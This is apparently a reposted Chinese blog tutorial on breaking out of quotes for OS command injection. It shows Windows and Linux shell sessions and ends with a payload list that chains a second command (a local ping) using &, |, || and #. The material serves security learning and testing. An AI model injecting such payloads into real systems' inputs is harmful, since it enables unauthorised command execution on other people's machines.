码迷,mamicode.com
首页 > 其他好文 > 详细

关于OS命令注入的闭合问题

时间:2021-07-19 16:57:00      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:估计   lin   运行   users   avg   seq   执行   src   aaa   

1、在Windows下

技术图片
 1 windows下非常好办,只需要&肯定可以执行:
 2 C:\Users\xxx\Desktop>aaaa | ping -n 5 127.0.0.1
 3 ‘aaaa‘ 不是内部或外部命令,也不是可运行的程序
 4 或批处理文件。
 5 
 6 C:\Users\xxx\Desktop>C:\Users\chenran01.ESG\Desktop\test.bat
 7 
 8 C:\Users\xxx\Desktop>aaaa‘ | ping -n 5 127.0.0.1
 9 ‘aaaa‘‘ 不是内部或外部命令,也不是可运行的程序
10 或批处理文件。
11 
12 C:\Users\xxx\Desktop>C:\Users\chenran01.ESG\Desktop\test.bat
13 
14 C:\Users\xxx\Desktop>aaaa‘ & ping -n 5 127.0.0.1
15 ‘aaaa‘‘ 不是内部或外部命令,也不是可运行的程序
16 或批处理文件。
17 
18 正在 Ping 127.0.0.1 具有 32 字节的数据:
19 来自 127.0.0.1 的回复: 字节=32 时间<1ms TTL=128
20 来自 127.0.0.1 的回复: 字节=32 时间<1ms TTL=128
21 来自 127.0.0.1 的回复: 字节=32 时间<1ms TTL=128
22 来自 127.0.0.1 的回复: 字节=32 时间<1ms TTL=128
23 来自 127.0.0.1 的回复: 字节=32 时间<1ms TTL=128
24 
25 127.0.0.1 的 Ping 统计信息:
26     数据包: 已发送 = 5,已接收 = 5,丢失 = 0 (0% 丢失),
27 往返行程的估计时间(以毫秒为单位):
28     最短 = 0ms,最长 = 0ms,平均 = 0ms
29 
30 C:\Users\xxx\Desktop>
技术图片

或者把&换成||上文中的例子也可以执行。

2、在Linux下:

在Linux下就显得复杂一些了

先来看一个可以执行的例子:

技术图片
1 $ ‘aaaa‘|ping -c 4 127.0.0.1 # ‘‘
2 -bash: aaaa: command not found
3 PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
4 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.042 ms
5 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.072 ms
6 64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.068 ms
7 64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.054 ms
技术图片

# ‘ 来闭合最后的‘从而达到了命令注入执行,如果去掉#就发现不行了

1 $ ‘aaaa|ping -c 4 127.0.0.1  ‘‘
2 > 

类似的这种需要闭合前面的‘

技术图片
 1 $ ‘aaaa‘|ping -c 4 127.0.0.1 
 2 -bash: aaaa: command not found
 3 PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
 4 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.063 ms
 5 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.072 ms
 6 64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.066 ms
 7 64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.062 ms
 8 
 9 --- 127.0.0.1 ping statistics ---
10 4 packets transmitted, 4 received, 0% packet loss, time 3000ms
11 rtt min/avg/max/mdev = 0.062/0.065/0.072/0.010 ms
12 $ ‘aaaa|ping -c 4 127.0.0.1 
13 > 
技术图片

上面是使用|的一些例子,下面来看看&

技术图片
 1 $ ‘aaa‘&ping -c 4 127.0.0.1
 2 [1] 4434
 3 -bash: aaa: command not found
 4 PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
 5 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.066 ms
 6 64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.069 ms
 7 64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.057 ms
 8 64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.067 ms
 9 
10 --- 127.0.0.1 ping statistics ---
11 4 packets transmitted, 4 received, 0% packet loss, time 2999ms
12 rtt min/avg/max/mdev = 0.057/0.064/0.069/0.010 ms
13 [1]+  Exit 127                ‘aaa‘
14 $ 
技术图片

综上闭合OS执行的payload只需:

技术图片
1 #windows:
2 ‘aaa&ping 127.0.0.1&‘
3 ‘aaa||ping 127.0.0.1||‘
4 #linux下:
5 ‘aaa‘&ping -c 4 127.0.0.1
6 ‘aaa‘|ping -c 4 127.0.0.1
7 ‘aaa‘|ping -c 4 127.0.0.1# ‘‘
技术图片

关于OS命令注入的闭合问题

标签:估计   lin   运行   users   avg   seq   执行   src   aaa   

原文地址:https://www.cnblogs.com/mutudou/p/15029654.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!